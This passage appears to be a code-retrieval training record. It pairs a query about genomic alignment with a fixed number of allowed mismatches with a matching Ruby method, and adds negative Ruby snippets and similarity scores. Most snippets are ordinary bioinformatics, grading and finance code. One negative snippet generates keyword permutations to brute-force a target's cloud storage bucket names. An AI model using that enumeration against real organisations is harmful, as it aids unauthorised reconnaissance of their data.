"def calcAdjustment(matrix,totalGenes)\n #score adjustment for col/row sum\n colAdj = 0\n matrix.colSums.each{|sum|\n colAdj += Math.log2star(sum)\n }\n \n rowAdj = 0\n matrix.rowSums.each{|sum|\n rowAdj += Math.log2star(sum)\n }\n\n # each row gets sorted by its sum \n rowSortAdj = matrix.rowSums.calcUniqPermutationsLog2\n colSortAdj = matrix.colSums.calcUniqPermutationsLog2\n sortAdj = rowSortAdj + colSortAdj\n\n # score adjustment for which set of N genes to use \n # (think \"multiple testing\" via binomial coefficient)\n testAdj = Math.binomCoefficientLog2(totalGenes,matrix.numRows)\n\n return colAdj + rowAdj + testAdj +sortAdj\nend",
"def final_letter_grades(grade_hash)\n averages(grade_hash).transform_values{ |marks| letter_grade(marks)}\nend",
"def calc_transf_stats()\n \n #take the greatest of complete and partial transfers\n sql=<<-END\nselect un.gene_id,\n un.PROK_GROUP_SOURCE_ID,\n un.PROK_GROUP_DEST_ID,\n max(val) as val\nfrom\n(\nselect gene_id,\n PROK_GROUP_SOURCE_ID,\n PROK_GROUP_DEST_ID,\n VAL\nfrom HGT_COM_GENE_GROUPS_VALS\n union\nselect gene_id,\n PROK_GROUP_SOURCE_ID,\n PROK_GROUP_DEST_ID,\n VAL\nfrom HGT_PAR_GENE_GROUPS_VALS\n) un\ngroup by un.gene_id,\n un.PROK_GROUP_SOURCE_ID,\n un.PROK_GROUP_DEST_ID\norder by un.gene_id,\n un.PROK_GROUP_SOURCE_ID,\n un.PROK_GROUP_DEST_ID\n END\n @hpggv_hsh = @conn.select_rows(sql) \\\n .each_with_object({ }){ |c, hsh| hsh[[c[0].to_i,c[1].to_i,c[2].to_i]] = c[3].to_f }\n \n #puts \"@hpggv_hsh: #{@hpggv_hsh.inspect}\"\n #sleep 20\n \n @sg_hsh = arGeneGroupCnt.find(:all) \\\n .each_with_object({ }){ |c, hsh| hsh[[c.gene_id,\n c.prok_group_id]\n ] = c.cnt }\n \n \n \n end",
"def calc_spread_to_benchmark(csv)\n file = prep_spread_data(csv)\n \n # print title\n print_spread('bond,benchmark,spread_to_benchmark')\n\n gov_lower = nil #hold government lower bound term\n corp_tmp = []\n file.each do |data|\n if data[1] == \"corporate\"\n corp_tmp.push data\n else # government entry\n if gov_lower.nil? and !corp_tmp.empty?\n # first entries are of type corporate (no lower bound)\n corp_tmp.each do |corp_data|\n print_spread(corp_data[0] << \",\" << data[0],\n (corp_data[3] - data[3]).abs)\n end\n else # given lower bound (gov_lower) and upper bound (data)\n corp_tmp.each do |corp_data|\n if((corp_data[2] - gov_lower[2]).abs < \n (corp_data[2] - data[2]).abs)\n # closest term is lower bound\n print_spread(corp_data[0] << \",\" << gov_lower[0],\n (corp_data[3] - gov_lower[3]).abs)\n else #closest term is upper bound\n print_spread(corp_data[0] << \",\" << data[0],\n (corp_data[3] - data[3]).abs)\n end\n end\n end\n corp_tmp = []\n gov_lower = data #update lower bound\n end\n end\n\n if !corp_tmp.empty?\n # there's corporate entries left, meaning there's no upperbound\n # use the last lower bound as closest\n corp_tmp.each do |corp_data|\n print_spread(corp_data[0] << \",\" << gov_lower[0],\n (corp_data[3] - gov_lower[3]).abs) \n end\n \n end\n\nend",
"def exec_seq(seq,blast_query)\n\n if ((self.class.to_s=='PluginLowQuality') && seq.seq_qual.nil? ) \n $LOG.debug \" Quality File haven't been provided. It's impossible to execute \" + self.class.to_s \n elsif ((seq.seq_qual.size>0) && (@params.get_param('use_qual').to_s=='true'))\n \n $LOG.debug \"[#{self.class.to_s}, seq: #{seq.seq_name}]: checking low quality of the sequence\"\n \n min_quality=@params.get_param('min_quality').to_i\n min_length_inside_seq=@params.get_param('min_length_inside_seq').to_i\n max_consecutive_good_bases=@params.get_param('max_consecutive_good_bases').to_i\n \n type='ActionLowQuality'\n actions=[]\n \n regions=get_low_qual_regions(seq.seq_qual,min_quality,min_length_inside_seq,max_consecutive_good_bases)\n \n regions.each do |r|\n low_qual_size=r.last-r.first+1\n \n # puts \"(#{low_qual_size}) = [#{r.first},#{r.last}]: #{a[r.first..r.last].map{|e| (\"%2d\" % e.to_s)}.join(' ')}\"\n \n \n add_stats('low_qual',low_qual_size)\n \n \n # create action\n a = seq.new_action(r.first,r.last,type) # adds the correspondent action to the sequence\n actions.push a\n \n \n \n end\n\n # add quals\n seq.add_actions(actions)\n end \n\n end",
"def expected_fractional_score(other)\n @e[other] ||= 1 / (1 + Math.exp(-other.gravity * (mean - other.mean)))\n end",
"def run\n super\n # create permutations\n additional_keywords = _get_option('additional_keywords').delete(' ').split(',')\n additional_keywords << _get_entity_name\n\n permutations = additional_keywords.map { |k| generate_permutations(k) } # generate permutations\n permutations << additional_keywords\n permutations.flatten!\n\n valid_buckets = bruteforce_buckets(permutations)\n _log \"Found #{valid_buckets.size} valid buckets.\"\n return if valid_buckets.empty?\n\n valid_buckets.each { |v| create_entity(v) }\n end",
"def averages(grade_hash)\n grade_hash\n .transform_values { |scores| scores.reduce(:+) / scores.length }\nend",
"def calc_transf_stats()\n \n @hpggv_hsh = arGeneGroupsVal.find(:all) \\\n .each_with_object({ }){ |c, hsh| hsh[[c.gene_id,\n c.prok_group_source_id,\n c.prok_group_dest_id]\n ] = c.val }\n \n #puts \"@hpggv_hsh: #{@hpggv_hsh.inspect}\"\n #sleep 20\n \n @sg_hsh = arGeneGroupCnt.find(:all) \\\n .each_with_object({ }){ |c, hsh| hsh[[c.gene_id,\n c.prok_group_id]\n ] = c.cnt }\n \n \n \n end",
"def create_Qreads_hist_data(qualities)\r\n hist = [0] * 50\r\n qualities.each do |qual|\r\n qual.each_char do |phred|\r\n q = convert_phred33_to_q(phred)\r\n hist[q] += 1\r\n end\r\n end\r\n return hist\r\nend"
] |
[
"0.6932818",
"0.62225187",
"0.59439397",
"0.56329626",
"0.56171745",
"0.56026036",
"0.5581892",
"0.5529177",
"0.54790694",
"0.54771227",
"0.53738934",
"0.53588796",
"0.5328883",
"0.53188115",
"0.52838665",
"0.5278783",
"0.5278012",
"0.52259076",
"0.5207305",
"0.51924706",
"0.5170211",
"0.5168706",
"0.51281065",
"0.50929785",
"0.50589436",
"0.5058168",
"0.5053032",
"0.5052412",
"0.5049633",
"0.5032585",
"0.50247765",
"0.50032103",
"0.49987283",
"0.49934545",
"0.4975765",
"0.49494272",
"0.49438688",
"0.49400035",
"0.4927066",
"0.49163276",
"0.48972258",
"0.48735103",
"0.48659632",
"0.48599046",
"0.4850532",
"0.48434642",
"0.48264444",
"0.48162138",
"0.481617",
"0.48043174",
"0.47862685",
"0.47836375",
"0.47760126",
"0.4760622",
"0.47351593",
"0.47201154",
"0.4714328",
"0.4710807",
"0.47097087",
"0.47082537",
"0.4700094",
"0.46933216",
"0.46862653",
"0.46726018",
"0.4671747",
"0.46693304",
"0.466925",
"0.46600696",
"0.46583202",
"0.46489093",
"0.46452165",
"0.4643779",
"0.46342266",
"0.46173754",
"0.46115202",
"0.46084154",
"0.45994085",
"0.45966983",
"0.45929834",
"0.45913526",
"0.45866597",
"0.45719215",
"0.4568302",
"0.45586434",
"0.45519564",
"0.45460498",
"0.45398197",
"0.45379084",
"0.4535207",
"0.45327243",
"0.45286644",
"0.45201182",
"0.4515215",
"0.45149496",
"0.45141006",
"0.45056856",
"0.4505525",
"0.44997737",
"0.44972426",
"0.4497135"
] |
0.74868
|
0
|
Performs genomic alignment with fixed number of allowed mismatches
|
def unbucketized_alignment
align(
@ref, @ref_base, @software,
{ annotation: @annotation,
tophat_aligner: @tophat_aligner,
mismatches: @mismatches
}
)
mapped_all = @software == :star ? \
@names.get('mapped_all_star') : @names.get('mapped_all')
run_cmd("cp #{mapped_all} #{@names.get('mapped_merged')}")
unless @software == :star
run_cmd(
"cp #{@names.get('unmapped')} #{@names.get('unmapped_merged')}"
)
end
@max_mismatches = @mismatches
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def process_alignment\n # init vars\n @names = []\n @seqs = []\n \n @alignment = \"-B #{@basename}.aln\"\n\n # import alignment file\n @content = IO.readlines(@infile).map {|line| line.chomp}\n \n #check alignment for gap-only columns\n remove_inserts\n \n #write query-file\n File.open(@infile, \"w\") do |file|\n file.write(\">#{@names[0]}\\n\")\n file.write(\"#{@seqs[0]}\\n\")\n end\n \n #write aln-file\n File.open(@basename + \".aln\", \"w\") do |file|\n @names.each_index do |num|\n file.write(\"Sequence#{num} \")\n file.write(\" \") if (num < 10)\n file.write(\" \") if (num < 100)\n file.write(\"#{@seqs[num]}\\n\")\n end\n end\n end",
"def genome(liszt)\n=begin\n[samopen] SAM header is present: 2 sequences\n7621912 reads; of these:\n 4009241 (52.60%) were paired; of these:\n 1983557 (49.47%) aligned concordantly 0 times\n 1818685 (45.36%) aligned concordantly exactly 1 time\n 206999 (5.16%) aligned concordantly >1 times\n ----\n 1983557 pairs aligned concordantly 0 times; of these:\n 409503 (20.64%) aligned discordantly 1 time\n ----\n 1574054 pairs aligned 0 times concordantly or discordantly; of these:\n 3148108 mates make up the pairs; of these:\n 1009275 (32.06%) aligned 0 times\n 35392 (1.12%) aligned exactly 1 time\n 2103441 (66.82%) aligned >1 times\n 3612671 (47.40%) were unpaired; of these:\n 498719 (13.80%) aligned 0 times\n 2246121 (62.17%) aligned exactly 1 time\n 867831 (24.02%) aligned >1 times\n=end\n #puts(liszt);exit\n dict={}; liszt.shift\n dict[\"total\"]=liszt.shift.split[0]; #liszt.shift\n dict[\"paired\"]=liszt.shift.split[0]; liszt.shift #conc 0\n dict[\"conc_once\"]=liszt.shift.split[0]\n dict[\"conc_mult\"]=liszt.shift.split[0]\n liszt.shift(2); dict[\"disc_once\"]=\"\"; dict[\"disc_mult\"]=\"\"\n line=liszt.shift\n line.include?(\">1 times\") ? dict[\"disc_mult\"]=line.split[0] : dict[\"disc_once\"]=line.split[0]\n liszt.shift\n dict[\"unaligned_pairs\"]=liszt.shift.split[0]\n liszt.shift\n dict[\"unmates\"]=liszt.shift.split[0] #unaligned mates\n dict[\"mate_once\"]=liszt.shift.split[0]\n dict[\"mate_mult\"]=liszt.shift.split[0]\n dict[\"unpaired\"]=liszt.shift.split[0]\n dict[\"unpair_unaligned\"]=liszt.shift.split[0]\n dict[\"unpair_once\"]=liszt.shift.split[0]\n dict[\"unpair_mult\"]=liszt.shift.split[0]\n dict\nend",
"def align_sequences_nm(sequence1, sequence2, scores)\n # Dynamic programming.\n dp = Array.new(sequence1.length + 1) { Array.new(sequence2.length + 1) }\n gap_score = scores['-']['-']\n dp[0][0] = [0, 0, 0, '|', '|']\n sequence1.chars.each_with_index do |c, i|\n dp[i + 1][0] = [(i + 1) * gap_score, 1, 0, c, '-']\n end\n sequence2.chars.each_with_index do |c, j|\n dp[0][j + 1] = [(j + 1) * gap_score, 0, 1, '-', c]\n end\n sequence1.chars.each_with_index do |base1, i|\n sequence2.chars.each_with_index do |base2, j|\n dp[i + 1][j + 1] = [[0, 1, '-', base2], [1, 0, '-', base1],\n [1, 1, base1, base2]].map { |i1, j1, match1, match2|\n [dp[i - i1 + 1][j - j1 + 1].first + scores[match1][match2],\n i1, j1, match1, match2]\n }.max\n end\n end\n \n # Solution reconstruction.\n i, j = *[sequence1, sequence2].map(&:length)\n match_score = dp[i][j].first\n align1, align2 = '', ''\n until i == 0 && j == 0\n score, i1, j1, base1, base2 = *dp[i][j]\n align1 << base1; i -= i1 \n align2 << base2; j -= j1\n end\n \n # Return values\n scores = dp.map { |line| line.map(&:first) }\n words = { [1, 0] => '$\\\\uparrow$', [0, 1] => '$\\\\leftarrow$',\n [1, 1] => '$\\\\nwarrow$', [0, 0] => '$\\\\cdot$'}\n parents = dp.map { |line| line.map { |item| words[item[1, 2]] } }\n { :scores => scores, :parents => parents, :match_score => match_score,\n :aligns => [align1, align2].map(&:reverse) }\nend",
"def align\n i = @max_cell_row\n j = @max_cell_column\n @first_result = \"\" \n @second_result = \"\" \n gaps_in_first = 0 # count of gaps in each sequence\n gaps_in_second = 0\n\n while true\n\n # end local alignment at 0 cell\n if @traceback_matrix[i, j] == 0\n break\n end\n\n # match/mismatch\n if @traceback_matrix[i, j] == 1\n @first_result << @first_string[i-1]\n @second_result << @second_string[j-1]\n i -= 1\n j -= 1\n end\n\n # deletion -> gap in S1\n if @traceback_matrix[i, j] == 2\n @first_result << \"-\"\n @second_result << @second_string[j-1]\n j -= 1\n gaps_in_first += 1\n end\n\n # insertion -> gap in S2\n if @traceback_matrix[i, j] == 3\n @first_result << @first_string[i-1]\n @second_result << \"-\"\n i -= 1\n gaps_in_second += 1\n end\n\n end\n # set variables to make writing to file prettier\n set_variables(gaps_in_first, gaps_in_second)\n end",
"def align_pairwise(bioseqs, opt={})\n factory = Bio::ClustalW.new\n clustal_opts = hash_opts_to_clustalopts(opt)\n factory.options = clustal_opts\n template = bioseqs.shift\n start_length = []\n pairwise_aligns = bioseqs.map do |bseq|\n clust_al = clustal_align([template, bseq], factory)\n cl_cons = clust_al.consensus\n aligned_string = clust_al[1].to_s\n #(st, len) = find_good_section(aligned_string, opt[:fidelity_length])\n seq_to_use = \n if opt[:consensus_fidelity]\n cl_cons\n else\n aligned_string\n end\n (st, len) = find_good_section(seq_to_use, opt[:fidelity_length])\n if st\n pristine = aligned_string[st, len].gsub('-','') # pristine read (ends removed)\n clustal_align([template.to_s, Bio::Sequence::NA.new(pristine)], factory)\n else\n warn \"a sequence does not meeting min fidelity! using original alignment\" \n clust_al\n end\n\n end\n end",
"def run_align_assess\n filename = self.generate_fasta_alignment_file_for_all\n string = \"./lib/AlignAssess_wShorterID #{filename} P\"\n seq_array = Array.new\n if system(string)\n seq_id_array = self.sequences.map{|s| s.seq_id}\n new_filename = filename + \"_assess\"\n f = File.new(new_filename, \"r\")\n flag = false\n read_row= 999999999\n cur_row = 0\n while (line = f.gets)\n if cur_row > read_row && flag\n if line == \"\\n\"\n flag =false\n else\n seq_array << line.split(\"\\t\")\n end\n elsif line == \"Pair-wise %ID over shorter sequence:\\n\"\n flag=true\n read_row = cur_row + 2\n end\n cur_row +=1\n end\n range = seq_array.length - 1\n #seq_array.each do |row|\n for row_num in 0..range\n for i in 1..range#(row_num) \n PercentIdentity.first_or_create(:seq1_id=>seq_id_array[row_num],\n :seq2_id=>seq_id_array[i],\n :alignment_name => self.alignment_name,\n :percent_id=>seq_array[row_num][i])\n # print \"[#{row_num}:#{i-1}=>#{row[i]}],\"\n end\n #print \"\\n\"\n end\n end\n end",
"def bucketized_alignment\n # split reads into buckets according to their size and err_rate\n @buckets = bucketize(@err_rate)\n\n # perform alignment on each bucket\n @buckets.reverse_each do |lower, upper, mismatches|\n @names.set_bucket(lower, upper)\n mapped, unmapped = align(\n @ref, @ref_base, @software,\n { annotation: @annotation,\n tophat_aligner: @tophat_aligner,\n mismatches: mismatches\n }\n )\n @mapped_bams << mapped\n @unmapped_bams << unmapped\n @max_mismatches = [@max_mismatches, mismatches].max\n end\n\n # merge alignments\n @names.unset_bucket\n unbucketize(@mapped_bams, @names.get('mapped_merged'))\n unbucketize(@unmapped_bams, @names.get('unmapped_merged'))\n end",
"def test_alignment_works_in_single_thread\n assert_nothing_raised(\"Can't handle single threaded scenario\") do\n SEQUENCE_GROUPS[0..10].each do |sequence_group|\n align_group(sequence_group)\n end\n end\n end",
"def merge_pairwise(aligns)\n ps = aligns.map do |align| \n seqs = []\n align.each do |bioseq|\n seqs << bioseq.to_s\n end\n seqs\n end\n template = []\n #m,x,n\n x = 2\n ftemp = ps.first.first\n nmax = ps.map {|pair| pair.first.size }.max\n mmax = ps.size\n mar = (0...mmax).to_a\n others = mar.map { [] }\n ns = mar.map { 0 }\n tn = 0\n on = 0\n (0...nmax).each do |n|\n (t_dsh, t_no_dsh) = mar.partition do |m| \n # this is RUBY 1.8 ONLY!!\n ps[m][0][ns[m]] == 45 # '-' is ascii 45\n end\n\n # if a template has a dash, all other off-templates need a dash\n if t_dsh.size > 0\n template[tn] = 45\n t_no_dsh.each do |m|\n # don't update these guys counter\n others[m][tn] = 45\n end\n t_dsh.each do |m|\n others[m][tn] = ps[m][1][ns[m]]\n ns[m] += 1\n end\n else # no dashes in the template\n t_no_dsh.each do |m|\n others[m][tn] = ps[m][1][ns[m]]\n end\n template[tn] = ps[0][0][ns[0]]\n ns.map!{|v| v+1 } \n end\n tn += 1\n end\n [cs_to_s(template), others.map! {|ar| cs_to_s(ar) } ]\n end",
"def align\n [:owner, :group, :size].each do |field|\n current = @alignment[field]\n @buffer.each do |line|\n new = line[field].length\n current = new if current < new\n end\n @alignment[field] = current\n end\n end",
"def align(ref, ref_base, software, opts = {})\n if software == :tophat\n bt_flag =\n opts[:tophat_aligner] == :bowtie1 ? '--bowtie1' : ''\n gap_flag =\n opts[:mismatches] < 2 ? \"--read-gap-length #{opts[:mismatches]}\" : ''\n end\n\n aln_cmd = {\n bowtie1:\n 'bowtie' \\\n \" --seedlen=#{opts[:seedlen]} #{ref_base}\" \\\n \" --un=#{@names.get('fp')}\" \\\n \" -q #{@names.get('trim')} \" \\\n \" --sam #{@names.get('ncrna')}\",\n bowtie2:\n 'bowtie2' \\\n \" --un #{@names.get('fp')}\" \\\n \" -x #{ref_base}\" \\\n \" -L #{opts[:seedlen]}\" \\\n \" -U #{@names.get('trim')}\" \\\n \" -S #{@names.get('ncrna')}\",\n bwa:\n 'bwa mem' \\\n \" -k #{opts[:seedlen]}\" \\\n \" #{ref} \" \\\n \" #{@names.get('trim')} \" \\\n \"| samtools view -b - > #{@names.get('ncrna')} \" \\\n '&& bam2fastq' \\\n \" -o #{@names.get('fp')}\" \\\n \" --no-aligned #{@names.get('ncrna')}\",\n tophat:\n 'tophat' \\\n \" --read-edit-dist #{opts[:mismatches]}\" \\\n \" #{bt_flag}\" \\\n \" -N #{opts[:mismatches]}\" \\\n \" --output-dir #{@names.get('topout')}\" \\\n ' --no-novel-juncs' \\\n \" #{gap_flag}\" \\\n \" --GTF #{opts[:annotation]}\" \\\n \" #{ref_base} #{@names.get('fp')}\",\n star:\n 'STAR' \\\n \" --genomeDir #{ref_base}\" \\\n \" --outFilterMismatchNmax #{opts[:mismatches]}\" \\\n \" --readFilesIn #{@names.get('fp')}\"\\\n \" --outFileNamePrefix #{@names.get('mapped_all')}\"\n }\n\n target =\n opts[:seedlen].nil? ? @names.get('mapped_all') : @names.get('fp')\n run_cmd(aln_cmd[software]) unless skip_step?(target, 'aligning')\n [@names.get('mapped_all'), @names.get('unmapped')]\n end",
"def align_all_words\n 0.upto(word_list.length-1) do |i|\n 0.upto(i-1) do |j|\n w1 = self[i]\n w2 = self[j]\n if (w1.meaning & w2.meaning).empty?\n LOGGER.debug(\"Skipping alignment for\\n\" +\n \"#{w1}\\n#{w2}\\nbecause they share no meaning\")\n next\n end\n @alignment_table.add(Alignment.new(w1, w2), i, j)\n end\n end\n end",
"def check_matchness(aa_sequence_hash,nt_sequence_hash)\n missing_nt_sequence = Array.new\n aa_sequence_hash.each do |defi, seq|\n if nt_sequence_hash[defi].nil? \n # miss that stuff\n missing_nt_sequence << defi\n end\n end\n\n missing_aa_sequence = Array.new\n nt_sequence_hash.each do |defi, seq|\n if aa_sequence_hash[defi].nil?\n missing_aa_sequence << defi\n end\n end\n\n\n return missing_aa_sequence, missing_nt_sequence\n end",
"def fix_gags(hash_of_sequence_ids_to_sequence_strings, sequence_id_to_gags={})\n log = Bio::Log::LoggerPlus['bio-gag']\n \n # Get the gags\n if sequence_id_to_gags == {}\n log.info \"Predicting gags from the pileup\"\n gags do |gag|\n sequence_id_to_gags[gag.ref_name] ||= []\n sequence_id_to_gags[gag.ref_name].push gag\n end\n else\n log.info \"Using pre-specified GAG errors\"\n end\n log.info \"Found #{sequence_id_to_gags.values.flatten.length} gag errors to fix\"\n \n # Make sure all gag errors in the pileup map to a sequence input fasta file by keeping tally\n accounted_for_seq_ids = []\n fixed_sequences = {} #Hash of sequence ids to sequences without gag errors\n hash_of_sequence_ids_to_sequence_strings.each do |seq_id, seq|\n log.debug \"Now attempting to fix sequence #{seq_id}, sequence #{seq}\"\n toilet = sequence_id_to_gags[seq_id]\n if toilet.nil?\n # No gag errors found in this sequence (or pessimistically the sequence wasn't in the pileup -leaving that issue to the user though)\n fixed_sequences[seq_id] = seq\n else\n # Gag error found at least once somewhere in this sequence\n # Record that this was touched in the pileup\n accounted_for_seq_ids.push seq_id\n \n # Output the fixed-up sequence\n last_gag = 0\n fixed = ''\n toilet.sort{|a,b| a.position<=>b.position}.each do |gag|\n #log.debug \"Attempting to fix gag at position #{gag.position} in sequence #{seq_id}, which is #{seq.length} bases long\"\n fixed = fixed+seq[last_gag..(gag.position-1)]\n fixed = fixed+seq[(gag.position-1)..(gag.position-1)]\n last_gag = gag.position\n #log.debug \"After fixing gag at position #{gag.position}, fixed sequence is now #{fixed}\"\n end\n fixed = fixed+seq[last_gag..(seq.length-1)]\n fixed_sequences[seq_id] = fixed\n end\n end\n \n unless accounted_for_seq_ids.length == sequence_id_to_gags.length\n log.warn \"Unexpectedly found GAG errors in sequences that weren't in the sequence that are to be fixed: Found gags in #{sequence_id_to_gags.length}, but only fixed #{accounted_for_seq_ids.length}\"\n end\n return fixed_sequences\n end",
"def compare_ranges(true_ranges, inferred_ranges, insertion_mode = false)\n matches = 0\n misaligned = 0\n # Sides can be one of \"none\", \"left\", \"right\", \"ambiguous\" or \"both\"\n sides = []\n true_ranges.each_with_index do |t1, i|\n next unless i.even?\n t2 = true_ranges[i+1]\n inferred_ranges.each_with_index do |i1, k|\n next unless k.even?\n old_matches = matches\n old_misaligned = misaligned\n i2 = inferred_ranges[k+1]\n if t1 <= i1 && t2 >= i2\n matches += (i2 - i1)\n side = \"none\"\n side = \"left\" if t1 == i1\n side = \"right\" if t2 == i2\n side = \"both\" if t2 == i2 && t1 == i1\n sides << side\n elsif !insertion_mode && t1 <= i1 && i1 < t2 && t2 <= i2\n matches += (t2 - i1)\n misaligned += i2 - t2\n if t1 == i1\n sides << \"left\"\n else\n sides << \"none\"\n end\n elsif insertion_mode && t1 <= i1 && i1 <= t2 && t2 <= i2\n #puts \"YOUNK\"\n matches += (t2 - i1)\n misaligned += i2 - t2\n #elsif t1 >= i1 && t2 <= i2\n # matches += (t2 - t1)\n # misaligned += (i2 - t2) + (t1 - i1)\n # $logger.debug \"BUBBLES\"\n elsif !insertion_mode && t1 >= i1 && t2 >= i2 && t1 < i2\n matches += (i2 - t1)\n misaligned += (t1 - i1)\n if t2 == i2\n sides << \"right\"\n else\n sides << \"none\"\n end\n elsif insertion_mode && t1 >= i1 && t2 >= i2 && t1 <= i2\n #puts \"YOUNS\"\n matches += (i2 - t1)\n misaligned += (t1 - i1)\n\n end\n $logger.debug \"Matches #{matches}\"\n $logger.debug \"Misaligned #{misaligned}\"\n if matches != old_matches || misaligned != old_misaligned\n inferred_ranges.delete_at(k)\n inferred_ranges.delete_at(k)\n break\n end\n #puts misaligned\n end\n end\n\n inferred_ranges.each_with_index do |i1, k|\n next unless k.even?\n i2 = inferred_ranges[k+1]\n misaligned += i2-i1\n sides << \"none\"\n end\n if matches < 0 || misaligned < 0\n puts matches\n puts misaligned\n exit\n end\n $logger.debug(\"SIDES #{sides}\")\n [matches, misaligned, sides]\nend",
"def mutations_effect(a_anno, a_gen)\n\n if $locus[a_anno[10]] && a_anno[3].length == a_anno[4].length\n $cdna.pos = $locus[a_anno[10]]\n transcript = original()\n exon_starts = a_gen[9].split(',')\n exon_ends = a_gen[10].split(',')\n mutation_position,exon_num = position_on_transcript(a_anno[1],a_gen[3],exon_starts,exon_ends,a_gen[6],a_gen[7])\n a_anno[12] = \"exon#{exon_num}\"\n start_triplet = (mutation_position/3 * 3) - 1\n if start_triplet >= 0\n code = transcript[start_triplet..start_triplet+2]\n pos_in_triplet = mutation_position%3\n original_aa = $codes[code]\n code[pos_in_triplet] = a_anno[4]\n mutated_aa = $codes[code[0..2]]\n if original_aa != mutated_aa\n a_anno[13] = pos_in_triplet + 1\n a_anno[14] = original_aa[:name]\n a_anno[15] = mutated_aa[:name]\n puts a_anno.join(\"\\t\")\n else\n a_anno[13] = \"same_AA\"\n STDERR.puts a_anno.join(\"\\t\")\n end\n end\n else\n if $locus_non_coding[a_anno[10]]\n a_anno[13] = \"ncrna\"\n STDERR.puts a_anno.join(\"\\t\")\n else\n if (a_anno[3].length > a_anno[4].length || a_anno[3].length < a_anno[4].length)\n a_anno[13] = \"indel\"\n puts a_anno.join(\"\\t\")\n else\n a_anno[13] = \"?\"\n STDERR.puts a_anno.join(\"\\t\")\n end\n end\n end\n\nend",
"def print_align(io, sequences, labels, opts={})\n opts = {:cutoff => 70, :start => 0, :chars => 20}.merge(opts)\n (start, length, chars) = opts.values_at(:start, :cutoff, :chars)\n spacer = \" \"\n\n if opts[:template]\n sequences.unshift(opts[:template])\n labels.unshift(opts[:template_label])\n end\n\n all_stats = Array.new(6,0)\n loop do\n fin = false\n\n max_length = 0\n lines = []\n consensus_line = \"\"\n fragments = sequences.map do |string|\n fin = (start >= string.length )\n break if fin\n\n string_frag = string[start, length]\n\n string_frag\n end ; break if fin\n\n doubles = fragments.zip(labels)\n\n doubles = doubles.select {|frag, _| (frag.size > 0) && (frag =~ /[^-]/) }\n\n max_length = doubles.map {|frag, _| frag.size }.max\n\n (cs, stats) = consensus_string_and_stats( doubles.map {|frag,_| frag } )\n all_stats = all_stats.zip(stats).map {|a,b| a + b }\n\n doubles.push( [cs, \"<CONSENSUS>\"] )\n\n lines = doubles.map {|frag, label| [exactly_chars(label, chars),spacer,frag].join }\n\n ## the counters at the top of the line\n start_s = start.to_s\n finish_s = (start + max_length).to_s\n count_line_gap = max_length - (start_s.size + finish_s.size)\n count_line = [start_s, spacer]\n unless count_line_gap < 1\n count_line << \" \" * count_line_gap\n end\n io.puts [exactly_chars(\"\", chars), spacer, count_line.join].join\n\n io.puts lines.join(\"\\n\")\n\n io.puts \" \" # separator between lines\n start += length\n end\n end",
"def sequence_check_for_submission(sequence,group_hash,reversed_group_hash)\n\n result_array = Array.new\n aa_threshold = 0.9\n \n begin\n \n query = Bio::FastaFormat.new( sequence )\n query_name = query.definition\n sequence = query.to_seq\n\n existing_matched_group_exist = CustomizedProteinSequence.find_by(:chain => sequence.seq)\n if !existing_matched_group_exist.nil? # find existing sequence\n result_array << collection(query_name, \"WARN\", \"Your sequence exists in our database. Common Name: #{existing_matched_group_exist.header} \")\n return result_array\n end\n\n sequence.auto # Guess the type of sequence. Changes the class of sequence.\n query_sequence_type = sequence.seq.class == Bio::Sequence::AA ? 'protein' : 'gene'\n\n program = 'blastp'\n database = 'reductive_dehalogenase_protein'\n blast_options = get_blast_options\n\n\n blaster = Bio::Blast.local( program, \"#{Rails.root}/index/blast/#{database}\", blast_options)\n aa_report = blaster.query(sequence.seq) # sequence.seq automatically remove the \\n; possibly other wildcard\n aa_similarity = aa_report.hits().length.to_f / aa_report.db_num().to_f\n identity_with_90 = check_alignment_identity(aa_report, 90) # identity_with_90 contains all the header that share >=90% identity\n\n # group_hash => group : Array {seq_definition}\n # reversed_group_hash = seq_definition : group\n if identity_with_90.length > 0\n identified_group_at_aa_level = get_identified_group(identity_with_90,group_hash,reversed_group_hash) # identified_group_at_aa_level contains confirmed group in aa level \n else\n # if identity_with_90.length == 0; no RD with ~=90% identity => create new RD groups\n\n if aa_similarity >= aa_threshold\n last_group = CustomizedProteinSequence.group(:group).order(:group).last.group\n new_group_number = last_group + 1\n result_array << collection(query_name,\"NEW\", \"Your sequence belongs to a new RD group: #{new_group_number}\",new_group_number)\n else\n result_array << collection(query_name, \"FAILED\",\"Your sequence doesn't share 90\\% identity of any sequences in database at amino acid level.\")\n end\n\n return result_array\n end\n\n if identified_group_at_aa_level.length > 0\n result_array << collection(query_name, \"SUCCESS\",\"Your sequence belongs RD group: #{identified_group_at_aa_level.join(\",\")}\",identified_group_at_aa_level.join(\",\"))\n else\n result_array << collection(query_name, \"FAILED\",\"Your sequence doesn't share 90\\% identity with all representatives of the group at amino acid level.\")\n end\n\n return result_array\n \n rescue => exception\n # puts exception\n result_array << collection(query_name, \"ERROR\",\"Your sequence is not validated. Or send it to our lab for manual checking.\")\n end\n \n return result_array\n\n end",
"def write\n\n # reverse alignments\n @first_result.reverse!\n @second_result.reverse!\n\n # Create middle section for matches/mismatches\n index = 0\n @first_result.length.times do\n if @first_result[index] == @second_result[index]\n @central_alignment << \"|\"\n else\n @central_alignment << \" \"\n end\n index += 1\n end\n\n offset = @start_first > @start_second ? @start_first.to_s.length : @start_second.to_s.length\n border = \"\"\n\n (offset+1).times do # lines up center with alignments\n border << \"=\"\n end\n\n # formats beginning and end of sequence output\n @first_result.insert(0, @start_first.to_s << \"=\")\n @first_result << \"=\" << @max_cell_row.to_s\n @second_result.insert(0, \"\" << @start_second.to_s << \"=\")\n @second_result << \"=\" << @max_cell_column.to_s\n @central_alignment.insert(0, border)\n @central_alignment << border\n\n # separate sequences and center into at most chunks of at most 60\n first_chunks = @first_result.scan(/.{1,60}/)\n central_chunks = @central_alignment.scan(/.{1,60}/)\n second_chunks = @second_result.scan(/.{1,60}/)\n\n length = first_chunks.length\n\n File.open(\"result.txt\", 'w') {|file| \n i = 0\n length.times do\n file.puts first_chunks[i]\n file.puts central_chunks[i]\n file.puts second_chunks[i]\n file.puts\n i += 1\n end\n }\n\n end",
"def sub_alignment _value=0\n send_cmd(\"sub_alignment #{_value}\")\n end",
